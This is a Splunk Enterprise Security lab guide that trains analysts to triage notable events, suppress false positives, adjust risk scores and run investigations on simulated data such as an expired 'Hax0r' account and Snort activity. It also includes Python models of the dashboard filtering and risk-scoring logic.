Using ES 6.6 Lab Guide

The document provides instructions for using the Splunk Enterprise Security application. It describes logging into the lab environment, exploring simulated event data and notable events, using the Security Posture and Incident Review dashboards to monitor security status and investigate incidents, and suppressing notable events. Key steps include searching for events, viewing event details, filtering dashboards, and changing an incident's status.


Using Splunk Enterprise Security Lab Exercises

Welcome to the Splunk Education lab environment. Your instructor will provide you with the URL to access
your Splunk server which has the Enterprise Security app installed. You will access the Splunk Web interface
via HTTPS using a browser on your local computer.

A set of Technical Add-ons (TAs) for Enterprise Security have been installed, and the lab environment is
running a testing app called SA-Eventgen that is generating simulated source events. In a production
environment, these events would be generated by Splunk forwarders, which would gather data from your
network’s servers, routers, and applications. Your lab event data only goes back as far as the time the lab
server was set up—probably only a day or so.

NOTE: Please disable popup blockers, ad blockers, and clear your cache (or use incognito mode).

Splunk Logon Credentials:


Username: analyst, password: b0ss0fth3s0c

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 1
Module 1 Lab – Overview of Splunk Enterprise Security
Description
In this exercise, you will get familiar with your lab environment and access the ES user interface.

Steps
Task 1: Log into your Splunk classroom server, configure your user account, and navigate to the ES
homepage.

1. Record your ES server URL (provided by your instructor):


2. Log into Splunk as analyst with the password b0ss0fth3s0c.
3. In the Splunk bar (top menu), select analyst > Account Settings to modify your account details.
4. Enter your name in the Full name field and click Save.
5. From the Splunk main menu select analyst > Preferences. Notice that there are two Preferences tabs,
Global and SPL Editor.
6. On the Global window, set your local time zone and select Enterprise Security as the Default
application.
7. On the SPL Editor window, toggle the Advanced editor button, then toggle the Line numbers button.
8. Click the Themes tab and select Dark Theme. Click Apply.

9. Navigate to the Enterprise Security homepage by clicking in the upper left corner or
going to App: > Enterprise Security.
Note: takes you to the Enterprise Security homepage because you set the Default
app to ES under analyst > Preferences.
10. On the Enterprise Security homepage, review the panels: Security Posture, Incident Review, App
Configuration, ES Documentation, Splunk Answers Community site, and Product Tour.

Task 2: Examine the source events in Splunk that ES is using to monitor the security environment
and review the notable events in the notable index.

11. From the top ES menu, select Search > Search to run a search using Splunk Search Processing
Language (SPL). This page is very similar to the Search & Reporting app you have used before.
12. Search for all events using an asterisk (*) over the Last 15 minutes. If the search runs for more than 30
seconds, you can stop it before it completes. Notice that tens of thousands of events were returned.
Tip: From the result count of this search you can extrapolate the daily indexing volume.
13. Examine the results, including the sources and source types—this will give you a feel for the type of
systems being monitored.
14. Examine the variety of source (src) and destination (dest) IP addresses and hostnames.
Tip: Review the host, signature, and index fields, and examine the eventtype being assigned to
the events.

15. Select All Fields and filter on a couple of fields you find interesting by selecting the checkbox for
each field. Close the Select Fields window. Notice that the new fields are now added under SELECTED
FIELDS.
16. Run a new search for all events against index=notable over the Last 24 hours and note the number of
events returned.
Note: Unless otherwise indicated, execute all searches using a time range of Last 24 hours.

17. Compare the number of notable events to the number of events in the main index over the last 15 minutes.
This demonstrates how useful notable events are; you do not need to search through all the data to find
the events that need attention.
18. Examine the source field values. These are the correlation search names that created the notable events.
19. Examine some of the other discovered fields. Note that they are extracted from the source events, so they
will be similar to what you saw in the main index.
20. Access the Security Posture dashboard. Add up the counts in the Key Indicator tiles. What is the
number of notables?
21. Access the Incident Review dashboard. Does the number of events shown in Incident Review
approximate the number of events in Security Posture?
Hint: review the number of events in the Edit all n Matching Events link.
22. Does this count approximate the number of events returned in the search against index=notable over the
last 24 hours?
23. What conclusions can you draw from these searches?
Answer: Many thousands of events per day are being ingested into Splunk. A small fraction are being
captured by ES correlation searches as notable events.

Module 2 Lab – Monitoring with ES
Description
In this exercise, you will use the Security Posture dashboard to monitor the overall security status of your
organization, and the Incident Review dashboard to work an incident. You will also suppress certain notable
events. For an extended example of the use of these tools, see
docs.splunk.com/Documentation/ES/latest/Usecases/MalwareDetection.

Steps
Scenario: You are investigating reports of unauthorized access to your network resources.

Task 1: Use the Security Posture dashboard.

1. Navigate to the Security Posture dashboard.


2. Review the values in the Key Indicators. Note the totals, as well as the net change for each in the last 24
hours. The net change is shown as either a red or green arrow with the change count.
3. Examine the contents of the 4 panels: Notable Events By Urgency, Notable Events Over Time, Top
Notable Events, and Top Notable Event Sources.
4. Hover over the bars in the Notable Events By Urgency panel and note the values.
5. In the Notable Events By Urgency panel, click the red (critical) bar.
6. Notice that the Incident Review dashboard opens to display only the “critical” notable events.
7. Navigate back to the Security Posture dashboard.
8. Examine the Top Notable Events panel.
9. Click the Activity from Expired User Identity row.
10. Examine the Correlation Search filter on the Incident Review dashboard. Note that it shows only notable
events from the Activity from Expired User Identity correlation search.
11. In the list of notable events, notice that the user account Hax0r has been accessing resources even
though the account is expired.
12. Reset the Incident Review dashboard by clicking Incident Review in the menu bar.
Tip: This re-opens the Incident Review dashboard with all fields set to default—a fast way to clear all
applied filters and reset the dashboard. You will use this technique frequently throughout the lab
exercises.

Task 2: Continue researching unauthorized network access.

13. In the Incident Review dashboard, search for the username Hax0r for the Last 24 hours. You should find
one or more notable events for this user. Remember to click Submit.
Hint: Use the Search field to enter the username.
14. In the results, click > to view the details for one of the Hax0r notable events.
15. Examine the details under Original Event. Some of this data may be useful to determine the seriousness
of this vulnerability.
16. Under Contributing Events, click the View activity from Hax0r link. This takes you to a new browser tab
with a New Search window with the raw events associated with this username.
The new search window uses a custom 10-minute time range which references the creation time of
the notable event (5 minutes before and 5 minutes after). This allows you to see raw events that
occurred immediately before and after the notable event.

17. Expand an event and note the Type=Failure Audit, Message=Logon Failure, User Name=Hax0r, and
the Source Network Address. You may have to click Show all 28 lines.
Tip: In this case, Type=Failure Audit and Message=Logon Failure indicate failed logon attempts.
So, Hax0r is not actually authenticating, but the fact that someone is attempting to use this expired
account is an issue.
18. Close the search window browser tab and return to the Incident Review dashboard.

Task 3: Begin working the issue.

19. In the Incident Review dashboard, make sure the search results are still filtered to the user Hax0r.
20. Click the Edit All n Matching Events link.
21. Click the Status drop-down, select In Progress and set the Owner to yourself.
22. Click Save changes and notice the change in status and ownership.
Now you can begin working with network analysts and others to research and resolve the issue. While
this takes place, you will still need to review new incidents.
23. At the top of the Incident Review dashboard, click in the Status field and select New. Hax0r is still in the
Search field. Click Submit. You are looking for incidents with Status = New that contain the text Hax0r.
24. Notice that you no longer see your In Progress Hax0r incidents.
You would do this to see only new incidents requiring attention. New events would normally be
assigned to an owner and their status changed to show they are In Progress or Resolved.
25. Reset the Incident Review dashboard.
26. In the Owner filter, select yourself and run the search.
27. You should only see incidents assigned to you. This is a typical way to view your assigned incidents.

Scenario: Several false positives have been generated and are coming from a set of servers named PROD-MFS-XXX,
which are a set of QA lab workstations used to test production security configurations.
You want to first determine the workstations’ status—are these workstations still online? You will
ping them to see.

Task 4: Test workstation status.

28. In the ES menu bar, select Incident Review.


29. In the Security Domain field, select Endpoint.
30. In the Search field, search for notable events associated with the PROD-MFS-* servers.
31. You should see several notable events for malware infections. Expand the details of one of these events.
32. Click the link under Contributing Events to see the original events that triggered this notable event.
A new search window opens and displays events from the Malware data model. Take a minute to
explore other information about the incidents.
33. Note that this information comes from the Malware data model, Malware_Attacks object.
34. Close the contributing events search window.
35. Now check the status of the affected system. In Incident Review, open the notable event’s Actions menu
and select Run Adaptive Response Actions.
36. Select + Add New Response Action and select Ping.
37. In the Ping form, from the Host Field drop-down list, select Destination (dest) and enter 4 in the Max
Results field. Use the default index of main. (You may need to disable popup blocker.)

Note: Index is where to save the results (existing index or custom index). Defaults to main. Worker Set is
used for executing adaptive response actions on a Splunk Cloud ES search head.
38. Click Run. The Ping action is dispatched.
39. Close the Adaptive Response Actions window.
40. In the incident’s details, scroll down to Adaptive Responses: and click the refresh icon.
41. Verify that your Ping action is listed with a success status.
42. Click Ping to see the results.
A new search window opens and displays the results of your Ping action. This verifies that the server
is online.
(Note that all the PROD-MFS* host names resolve to 127.0.0.1—this is intentional for our lab
environment.)
43. Close the search window.

Scenario: Now that you know the status of the test systems, close out the affected false positive notable
events.

Task 5: Remove the false positives from the list of incidents.

44. In Incident Review, make sure you are still displaying all of the events in the Endpoint domain for PROD-MFS-* servers.
45. Click Edit All n Matching Events.
46. Change the Status to Closed and make sure the Owner is set to you.
47. In the comments, enter False positive generated by testing process.
48. Click Save changes and you will be returned to Incident Review.

Task 6: You have resolved the Hax0r issue by hardening a firewall asset. You can now resolve your
incident.

49. Reset the Incident Review dashboard, filter Status to In Progress and search for all Hax0r incidents.
Click Submit.
50. Click Edit all n Matching Events.
51. Change the status to Resolved and click Save changes.
In the future, you probably want to see only unresolved, open incidents.
52. Clear the dashboard.
53. Search for open incidents by selecting all status values except Resolved and Closed from the Status filter
and click Submit.
54. Verify that the Resolved and Closed Hax0r incidents do not appear in the search results. (You could see
a New notable event on top that just got generated by the correlation search.)
55. Clear the Incident Review dashboard, and practice filtering out all events except those that are Resolved
(4) or Closed (5). Enter status>3 in the Search field. You should now only see the Resolved or Closed
events.
Tip: The event status field name is status, lower case, and the values are integers, with 0 =
“unassigned”, 1 = “new”, 2 = “in progress”, 3 = “pending”, 4 = “resolved”, and 5 = “closed”.

Scenario: You have closed the PROD-MFS-XXX false positives, but new notable events will still occur. You
would like to suppress them for the rest of the testing project.

Task 7: Suppress notable events.

56. Clear the Incident Review dashboard.


57. In the Search filter, enter PROD-MFS-* and click Submit.
58. Note the server name and signature on the first few results (e.g. Mal/EncPk-C On PROD-MFS-001,
LeakTest On PROD-MFS-005, HIPS/IPConnect-002 On PROD-MFS-004).
59. On one of these events, click the Actions menu and select Suppress Notable Events.
Note: For the purpose of this exercise you are suppressing notables for the selected server and
signature (e.g. LeakTest On PROD-MFS-002).
The selected server could appear in other notables for a different signature.
In a production environment, if a high number of servers were identified as false positives, your ES
administrator would likely make a permanent adjustment to the correlation search to prevent future
false positives from occurring.
60. In the Suppress From … To fields, select a range from now until a date 6 months in the future.
61. Select Save to return to Incident Review.
Note: no new notable events will be generated for this server with this signature for the next 6
months.
62. To confirm the suppression, search for the machine name (PROD-MFS-XXX) noted in the steps above. You
should not see events for the server name and signature, though you may see events for the same server
with a different signature.
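The filtering and suppression behaviour exercised in Tasks 5 through 7 (the integer status codes behind the status>3 search, the Status and Security Domain filters, and a suppression of one server/signature pair that leaves other signatures on the same server visible), modelled in Python as an added example. This is not Splunk's code: the Notable fields, the sample events and the half-year suppression window are constructed assumptions.

```python
import fnmatch
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Iterable, List, Optional

# Integer status codes, as given in the lab tip for the notable `status` field.
STATUS_CODES = {0: "unassigned", 1: "new", 2: "in progress",
                3: "pending", 4: "resolved", 5: "closed"}


@dataclass
class Notable:
    time: datetime
    security_domain: str
    dest: str
    signature: str
    user: str
    status: int


@dataclass
class Suppression:
    """Hides notables for one dest+signature pair whose time falls in [start, end].
    Notables that already exist and other signatures on the same server are
    untouched (a model of the behaviour, not Splunk's implementation)."""
    dest: str
    signature: str
    start: datetime
    end: datetime

    def hides(self, n: Notable) -> bool:
        return (n.dest == self.dest and n.signature == self.signature
                and self.start <= n.time <= self.end)


NOW = datetime(2021, 9, 20, 12, 0, tzinfo=timezone.utc)  # constructed clock

# Constructed sample notables modelled on the lab's PROD-MFS-* hosts and Hax0r.
NOTABLES = [
    Notable(NOW - timedelta(hours=2), "endpoint", "PROD-MFS-001", "Mal/EncPk-C", "", 5),
    Notable(NOW - timedelta(minutes=30), "endpoint", "PROD-MFS-002", "LeakTest", "", 1),
    Notable(NOW + timedelta(hours=1), "endpoint", "PROD-MFS-002", "LeakTest", "", 1),
    Notable(NOW + timedelta(hours=1), "endpoint", "PROD-MFS-002", "HIPS/IPConnect-002", "", 1),
    Notable(NOW - timedelta(hours=3), "access", "10.0.0.5", "Logon Failure", "Hax0r", 2),
    Notable(NOW - timedelta(hours=5), "access", "10.0.0.5", "Logon Failure", "Hax0r", 4),
]

_CMP = re.compile(r"^(\w+)\s*(>=|<=|>|<|=)\s*(\d+)$")
_OPS = {">": lambda a, b: a > b, "<": lambda a, b: a < b, "=": lambda a, b: a == b,
        ">=": lambda a, b: a >= b, "<=": lambda a, b: a <= b}


def text_matches(n: Notable, search: str) -> bool:
    """The Search field: a numeric comparison such as `status>3`, or a
    case-insensitive glob (`PROD-MFS-*`, `Hax0r`) tried against the text fields."""
    m = _CMP.match(search.strip())
    if m:
        field, op, value = m.groups()
        return _OPS[op](int(getattr(n, field)), int(value))
    pattern = search.lower() if "*" in search else f"*{search.lower()}*"
    return any(fnmatch.fnmatchcase(v.lower(), pattern)
               for v in (n.dest, n.signature, n.user, n.security_domain))


def incident_review(events: Iterable[Notable], search: str = "",
                    status: Optional[List[int]] = None, domain: Optional[str] = None,
                    suppressions: Iterable[Suppression] = ()) -> List[Notable]:
    """Apply the Incident Review filters: a suppressed notable never appears,
    then Security Domain, Status and the Search field narrow what is left."""
    suppressions = list(suppressions)
    out = []
    for n in events:
        if any(s.hides(n) for s in suppressions):
            continue
        if domain and n.security_domain != domain:
            continue
        if status is not None and n.status not in status:
            continue
        if search and not text_matches(n, search):
            continue
        out.append(n)
    return out


def open_statuses() -> List[int]:
    """Every status except resolved (4) and closed (5), as selected in step 53."""
    return [code for code in STATUS_CODES if code not in (4, 5)]


if __name__ == "__main__":
    half_year = Suppression("PROD-MFS-002", "LeakTest", NOW, NOW + timedelta(days=182))
    for n in incident_review(NOTABLES, "PROD-MFS-*", domain="endpoint", suppressions=[half_year]):
        print(n.time.isoformat(), n.dest, n.signature, STATUS_CODES[n.status])
```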

Module 3 Lab – Risk-Based Alerting
Description
In this lab exercise, you will filter the Incident Review dashboard for Risk Notables and view the risk-based
information available for the risk objects. You will then use the Risk Analysis dashboard to examine how risk
is allocated to objects and users in your environment.

Steps
Task 1: Review the risk-based information for a risk notable.

1. Navigate to the Incident Review dashboard.


2. From the Type drop-down select Risk Notable and from the Time drop-down select Last 60 minutes.
Click Submit.
3. Select the checkbox for one of the Risk Notables and click Edit Selected.
4. Edit the event with the following information, click Save changes, then click Close.
• Status: In Progress
• Urgency: High
• Owner: Assign to me
• Disposition: True Positive – Suspicious Activity

Note: Use the Disposition field to classify the notable and separate out the false positives without
impacting the status of the notable. Dispositions enable you to drill down on the notables that pose the
highest threat and accelerate the triage of notables during an investigation, which helps you respond to
security threats faster.

5. On the Incident Review dashboard, click Clear all to clear the filters selected above.
6. Sort the Incident Review dashboard for Risk Notables with a Status of In Progress. Click Submit.
7. Expand the risk notable that has been assigned to you and click the Contributing Events link to view the
individual risk attributions that created the risk notable. A new search window opens.
Note: The “Risk Threshold Exceeded For Object Over 24 Hour Period” correlation search triggers
when the risk score for a specific object reaches a threshold of 100 over a 24-hour period.

8. Close the new search window and return to the filtered Incident Review dashboard.
9. Click the down-arrow for the Risk Object and click Workbench – Risk (risk_object) as Asset or
Workbench – Risk (risk_object) as Identity depending on the type of risk object selected (system or
user).
10. View the recent risk modifiers for the risk object. These events are pulled from the Risk Analysis data
model.
11. Scroll to the bottom and view the information in the Risk Scores by Artifact and MITRE ATT&CK
Techniques and Tactics panels.
12. Close the Embedded Workbench.
13. Click the number in the Risk Events column which represents the number of risk-based events that
created the risk notable for the object (system or user).
14. Review the information on the Risk Events window. The top panel displays the timeline visualization of the
contributing risk events. Use the zoom tools on the right to change the timeline.
Note: Zooming in/out can help narrow down the time of occurrence. The timeline visualization plots
the contributing risk events using time on the x-axis and risk score on the y-axis. The timeline
visualization uses color codes on the icons that indicate the severity of the risk scores. A lower risk
score corresponds to a lighter color icon.

15. Click on several of the events in the timeline visualization to view the details of the event including the
name of the correlation search that created the event, the time of the event, and any MITRE ATT&CK
tactics and techniques configured for the correlation search.
Note: clicking an event in the timeline visualization highlights the corresponding event in the
Contributing Risk Events panel.

16. From the Contributing Risk Events panel, expand an event to view the details including the risk rule, risk
score, annotations, and threat object.
17. Close the Risk Events window.

Scenario: Hax0r is a high-risk user—use the Risk Analysis dashboard to examine where this risk
comes from.

Task 2: Examine user risk.

18. Navigate to the Incident Review dashboard and search for Hax0r.
19. Open the details of a Hax0r incident. The number in the red box next to the Hax0r user ID is the all-time risk
score for the user.
(If Hax0r also had an email address, the risk score in Incident Review would be the sum of both
scores. On the Risk Analysis dashboard, the score is not cumulative, but specific to the username.)
20. Click Hax0r’s Risk Score to open the Risk Analysis dashboard (automatically filtered to Hax0r).
Based on the Most Active Sources panel you can see that Hax0r’s risk comes from the correlation
search Identity - Activity from Expired User Identity - Rule.
21. Clear Hax0r from the Risk Object filter and re-run the search.
Now you see all risk activity for the Last 7 days.
22. Examine the Risk Modifiers Over Time graph.
This shows a diagram over time (default: previous 7 days) that indicates points in time when risk
scores on assets in your enterprise increased.
Important: Events where the risk score increased rapidly are cause for concern.
23. Click on the largest risk score column in the graph to drill down into the source events that triggered the
increase in risk.
24. Examine the fields available.
The data in these fields can help you understand what threats, systems, processes, and users could
be involved in the increased risk assessment.
25. Navigate back to Security Intelligence > Risk Analysis.
26. Examine the panels: Risk Score by Object, Most Active Sources, and Recent Risk Modifiers.
27. Practice drilling down by object or risk source. (There are other risk objects and users in addition to
Hax0r.)
28. From Security Intelligence > Risk Analysis re-sort the Risk Score By Object panel by source_count
(this will show how many different sources of correlation searches there are for each risk object and put
the ones with the most sources of risk at the top).
29. Click one of the top rows containing an IP address to drill down into the search behind the result.

The drill down search uses the Risk Analysis data model. The events are stored in the Risk index.
Each event in the Risk index is an association to a user or device and a risk score. This is where all
risk scoring is stored.
All the risk sources are from correlation searches. Individually, each correlation search severity may
not be very high, but taken together, they are causing the risk score of this object to increase more
than other objects.
If this were a real environment, you might start an investigation into why this object has so many
sources of risk.
30. Navigate back to the Risk Analysis dashboard and examine the Most Active Sources panel.
31. You can re-sort by risk_score, risk_objects, or count to identify the most common sources of risk in
your environment. This could help you prioritize your risk mitigation effort.

Scenario: You determine that the Hax0r account has not been compromised, and therefore you can
reduce the risk for this user.

Task 3: Manually adjust a risk score.

32. In the Risk Object filter, type: Hax0r and click Submit.
33. Make a note of Hax0r’s current risk score. You will erase the score accumulated for Hax0r.
34. Click Create Ad-Hoc Risk Entry.
35. Enter the negative value of Hax0r’s current risk score. (If the current score is 160, enter -160.)
36. Populate the remaining fields as follows:
Risk Message: Resetting Risk
Risk object: Hax0r (this is case sensitive and must be entered exactly as shown)
Risk object type: user

37. Click to remove Threat Objects.


38. Click Save.
39. Refresh your browser window or select Security Intelligence > Risk Analysis again.
40. Filter the form to user Hax0r and set the time range to Last 7 days. Click Submit.
41. Verify that the net risk applied to Hax0r for the last 7 days has been reduced to 0.
42. In the Most Active Sources panel, click the AdHoc Risk Score adjustment you just created to drill down
into the risk index data. The AdHoc Risk Score adjustment has been placed in the risk index.
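The risk-index behaviour behind Tasks 2 and 3 (the 24-hour threshold of 100 that raises a risk notable, the source_count re-sort of the Risk Score By Object panel, and the negative ad-hoc entry that nets Hax0r's 7-day score to 0), as an added Python model that is not Splunk's code. The event layout, the sample scores and every correlation search name other than the one quoted in the lab are constructed assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional

RISK_THRESHOLD = 100           # the lab note: a score of 100 over a 24-hour period
WINDOW_24H = timedelta(hours=24)
WINDOW_7D = timedelta(days=7)  # Risk Analysis dashboard default range


@dataclass
class RiskModifier:
    """One row in the risk index: a score attributed to a user or system by a
    correlation search (or by an ad-hoc entry). Field names follow the lab."""
    time: datetime
    risk_object: str
    risk_object_type: str      # "user" or "system"
    risk_score: int
    source: str                # correlation search (or "AdHoc Risk Score") that wrote it
    threat_object: Optional[str] = None
    risk_message: str = ""


NOW = datetime(2021, 9, 20, 12, 0, tzinfo=timezone.utc)  # constructed clock
EXPIRED_ID = "Identity - Activity from Expired User Identity - Rule"

# Constructed risk events; the searches other than EXPIRED_ID are made-up names.
RISK_INDEX: List[RiskModifier] = [
    RiskModifier(NOW - timedelta(hours=3), "Hax0r", "user", 80, EXPIRED_ID),
    RiskModifier(NOW - timedelta(hours=2), "Hax0r", "user", 80, EXPIRED_ID),
    RiskModifier(NOW - timedelta(days=3), "Hax0r", "user", 40, EXPIRED_ID),
    RiskModifier(NOW - timedelta(hours=6), "10.0.0.9", "system", 30,
                 "Endpoint - Example Malware - Rule", threat_object="Mal/EncPk-C"),
    RiskModifier(NOW - timedelta(hours=5), "10.0.0.9", "system", 30,
                 "Network - Example Port Scan - Rule"),
    RiskModifier(NOW - timedelta(hours=1), "10.0.0.9", "system", 20,
                 "Threat - Example Threat List Match - Rule", threat_object="bad.example"),
]


def in_window(e: RiskModifier, now: datetime, window: timedelta) -> bool:
    return now - window < e.time <= now


def risk_score(events, risk_object: str, now: datetime, window: timedelta) -> int:
    """Sum of the object's risk modifiers inside the trailing window; this is the
    figure Risk Analysis displays and the threshold rule compares."""
    return sum(e.risk_score for e in events
               if e.risk_object == risk_object and in_window(e, now, window))


def risk_notables(events, now: datetime, threshold: int = RISK_THRESHOLD) -> List[str]:
    """Objects for which 'Risk Threshold Exceeded For Object Over 24 Hour Period'
    would raise a risk notable."""
    objects = sorted({e.risk_object for e in events})
    return [o for o in objects if risk_score(events, o, now, WINDOW_24H) >= threshold]


def risk_score_by_object(events, now: datetime, window: timedelta = WINDOW_7D) -> List[Dict]:
    """Rows of the Risk Score By Object panel re-sorted by source_count (step 28):
    objects hit by the most distinct correlation searches come first."""
    sources = defaultdict(set)
    for e in events:
        if in_window(e, now, window):
            sources[e.risk_object].add(e.source)
    rows = [{"risk_object": o, "risk_score": risk_score(events, o, now, window),
             "source_count": len(s)} for o, s in sources.items()]
    return sorted(rows, key=lambda r: (-r["source_count"], -r["risk_score"]))


def reset_risk(events: List[RiskModifier], risk_object: str, risk_object_type: str,
               now: datetime, window: timedelta = WINDOW_7D) -> RiskModifier:
    """Task 3: add an ad-hoc entry worth the negative of the current score so the
    net score over the window becomes 0. Nothing is deleted: the adjustment is an
    ordinary risk event that stays in the index next to the ones it cancels."""
    current = risk_score(events, risk_object, now, window)
    entry = RiskModifier(now, risk_object, risk_object_type, -current,
                         "AdHoc Risk Score", risk_message="Resetting Risk")
    events.append(entry)
    return entry


if __name__ == "__main__":
    index = list(RISK_INDEX)
    print("risk notables:", risk_notables(index, NOW))
    for row in risk_score_by_object(index, NOW):
        print(row)
    reset_risk(index, "Hax0r", "user", NOW)
    print("Hax0r 7-day score after reset:", risk_score(index, "Hax0r", NOW, WINDOW_7D))
```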

Module 4 Lab – Investigating with ES
Description
In this lab exercise, you will use the Investigation Workbench to investigate and document potential threats.

Steps
Scenario: You notice that there are a number of events from an expired user named Hax0r. You
decide that an investigation should be opened for further research.

Task 1: Create an investigation to monitor user Hax0r over time.

1. Click Investigations > Create new investigation.


2. Name your investigation Identity to Monitor: Hax0r.
3. Change the Status to In Progress and click Save.
4. Click on the new investigation to open it.
5. The Investigation Workbench opens. The Investigation Bar is displayed at the bottom of the window.
Icons include: notify on new related notables , add an investigation artifact , run a quick search ,
add a note to an investigation , and add an action history item to an investigation .

6. From the Investigation Bar, click to add an artifact (or click the + Add Artifact button).
7. The Add Artifacts window appears. In the Artifact field, enter Hax0r and notice that the Type field
recognized your entry as an Identity.
8. Click Expand artifact and notice that the identity lookups discovered related identities.
9. Click Add to Scope.

10. Under Artifacts on the investigation page, select the radio button for Hax0r and click Explore.
11. Examine the tabs and panels on the right. Notice that areas were automatically populated with information
for you to explore and document.
12. Select the Endpoint Data tab and scroll down to the Authentication Data pane.
13. From the entry under Authentication Data, add the following artifacts to your investigation: src,
src_user, and dest. Complete the following for each new artifact:
• Click each artifact and the Add Artifacts window opens.
• The Artifact field is populated with the artifact name.
• From the Type drop-down select Asset for src and dest, and Identity for src_user.
• Click Add to Scope.
14. The new artifacts are added to the Artifacts window on the left. Click the Select All link and click Explore.
15. Review the new information added under the Endpoint Data, Network Data, and Risk tabs.
16. Click +Add Content then click Add single tab. From the Select a tab dropdown, select Authentication.
17. Click Save.
18. Scroll to the bottom of the Authentication tab and review the panels and data added to the investigation.
19. On the Authentication - Source panel, click the expand icon .
20. From the dest column, add a few of the entries as “Asset” artifacts, and from the user column add a few
usernames as “Identity” artifacts.

21. From the investigation Artifacts window click the Select all link and click Explore. The newly added dest
and user artifacts are added to the investigation tabs.
22. Review the information added to Context, Endpoint Data, Network Data, Risk, and Authentication
(remember to collapse the Authentication - Source window on the Authentication tab).

23. Select the Timeline and Summary views and notice that there are no notable events
associated with the investigation. Let’s add some notables!

Task 2: Add notable events to your investigation.

24. From the Incident Review dashboard, search for Hax0r events over the last 24 hours.
25. Select the checkboxes for the first 5 events found and click Add Selected to Investigation.
26. From the Add Event to Investigation window, click the link next to Investigation.
27. Choose the Identity to Monitor: Hax0r investigation and click Save.
28. The events are added to the investigation. Click Open Identity to Monitor: Hax0r.
29. The Artifact Extraction window opens showing that the Hax0r artifact already exists because it was
added earlier with all its aliases. Click Ok.

Task 3: Add an alert for results of future related notable events.

30. On the Investigation Bar, click the bell icon .


31. In the Related Notable Event Livefeed for Last 48 Hours window, click the Enable notification toggle.
32. View the notable events. Any new events involving Hax0r for the last 48 hours are listed here.

33. If one or more events are listed, select an event and add it to your investigation using the plus sign .
You may add all or some of the events to your investigation.
34. If you are done reviewing and have left some events deselected, click Mark all as Seen.
35. Click Close.
The next time a notable event is generated for Hax0r, the Related Notable Events icon changes from
gray to orange.

36. Notable events can now be seen under the Summary and Timeline views.

Scenario: As you are exploring, your supervisor calls. Your supervisor assigns you an urgent task to
investigate the use of Snort in your environment. (Snort is not on the list of approved
network tools.)

Task 4: Start an investigation and add a note.

37. Navigate to Investigations.


38. Click Create new investigation.
39. Enter a title of Snort Activity.
40. Set the status to In Progress.

41. Click Start investigation and the Investigation Workbench opens.
42. Add a note by clicking the Notes icon in the bottom right. The Investigation notes window opens.
43. Under Notes, click +Add new Note, and the Create Note window opens.
44. Enter the values below:
Title: Start investigation
Note: Investigating the use of Snort on the network.
45. Click Add to investigation and notice that the new note is added under Notes. Close the Investigation
notes window using the X in the upper right corner.
46. From the Investigation Workbench, select the Timeline view. From the Type: drop-down select Note.
Notice that no notes display under the Timeline.
47. Click the Notes icon, then click the Start Investigation note created above. The Edit Note window
opens.
48. Check the Show on timeline checkbox and click Save. Notice the Start Investigation note is now under
Timeline Notes.
49. Close the Investigation notes window.
50. From the Investigation Workbench, select the Timeline view, and notice that the Start Investigation
note now displays in the Timeline. Note that you can make a note visible on the Timeline by using the
+Add new Timeline Note option in the Investigation notes window, or by checking the Show on
timeline checkbox in a standard note.

Task 5: Find Snort events and add a Quick Search.

51. Add a search by clicking the Quick Search icon in the Investigation Bar.
52. Run the search index=main snort for the Last 60 minutes.
53. Click Add Search String to Investigation.
54. Click the Notes icon .
55. Click + Add new Note to add a note to the investigation.
Title: Quick Search shows Snort activity for last 60 minutes.
Note: Snort is not approved.
Select the Show on timeline checkbox.
56. Click Add to investigation. Close the Investigation notes window.

Task 6: Create a notable event to track status.

57. In Quick Search, click to expand one of the Snort events.

Tip: Click and drag the icon to expand the Quick Search window.
58. Click the Event Actions button, then select Create notable event.
59. Enter field values as follows:
Title: Snort activity example
Security Domain: Network
Urgency: High
Owner: yourself (analyst)
Status: In Progress
Description: No authorized use of snort in our network—investigating.

Using Splunk Enterprise Security 9/20/2021 © 2021 Splunk Inc. All rights reserved 13
60. Save the new notable event and you are redirected to Incident Review.
61. The Incident Review dashboard shows your ad hoc notable event in the results list. (If you do not see it,
refresh the page by clicking Incident Review.)
62. Select the checkbox for the event.
63. Under the Actions heading at the right, select Add Event to Investigation.
64. In the Add Event to Investigation window, click the Investigation drop-down and select your Snort
Activity investigation.
65. Click Save and click the Close button.

Task 7: Analyze Snort activity.

66. Navigate to Incident Review.


67. At the lower left corner of the Incident Review dashboard in the Investigation Bar, click the All
Investigations icon.
68. Select the Snort Activity investigation.

69. Click the Quick Search icon.


70. In the search bar, execute the following search over the Last 60 minutes:
index=main snort | stats count by category | sort -count
You see an overview of the types of most attempted Snort activity.
71. Click the Add Search String to Investigation button.
72. Highlight and copy the first two events.
73. Click the Notes icon and add a note documenting the top two types of attacks (from the Quick Search
results).
74. Enter a name for the note, paste the events into the Note field, select the Show on timeline checkbox,
and click Add to investigation. Close the Investigation notes window.
75. Update and run the Quick Search to include the destination IP addresses and click Add Search String to
Investigation.
index=main snort | stats count by dest, category | sort -count
76. Highlight and copy the first two events.
77. Click the Notes icon and add a note documenting top two destination (host) IP addresses (from the Quick
Search results).
78. Enter a title for the note, paste the events into the Note field, select the Show on timeline checkbox, click
Add to investigation, and close the Investigation notes window.
Now you have documented which endpoints in your network are being targeted, and what types of
attacks are being used.
79. Update the Quick Search to determine where the Snort attempts are originating:
index=main snort | stats count by src | sort -count
80. Highlight and copy the first two events.
81. Add a note documenting the most frequent source IPs (from the Quick Search results).
82. Enter a title for the note, paste the events into the Note field, select the Show on timeline checkbox, click
Add to Investigation, and close the Investigation notes window.

Task 8: Investigate source systems.

83. In your Quick Search window, run this search for the Last 60 minutes, replacing
most.common.src.ip with the source IP address from the last Quick Search done above:
index=main snort src="most.common.src.ip"
84. Expand the details of one of the events.
85. Scroll down to the src field.
86. At the far right under Actions, open the field menu for the src field (the down arrow at the far right).
There are many investigative tools here—you will look at a couple.
87. Scroll down and select the Nslookup option (which finds the domain name of an IP address, or the IP
address of a domain name).
A new search window opens and shows the results of the nslookup command. Examine the
information.
88. Return to the investigation and click to add an Action History item.
89. In the Add Action History window, click Select action history type > Search Run and click the spyglass
(Search).
90. The first item that appears should be the nslookup search you just ran. Select Add to Investigation and
click Done.
91. From the Quick Search window, open the src field's Action menu, and select Intrusion Search (as
source). The Intrusion Search dashboard opens.
This dashboard shows the types of IDS events that have been generated for this server.
The signature column lists various types of attacks happening on this server.
The dest values identify the target(s) of the attacks.
92. Expand one of the source events in the lower panel to examine its details.

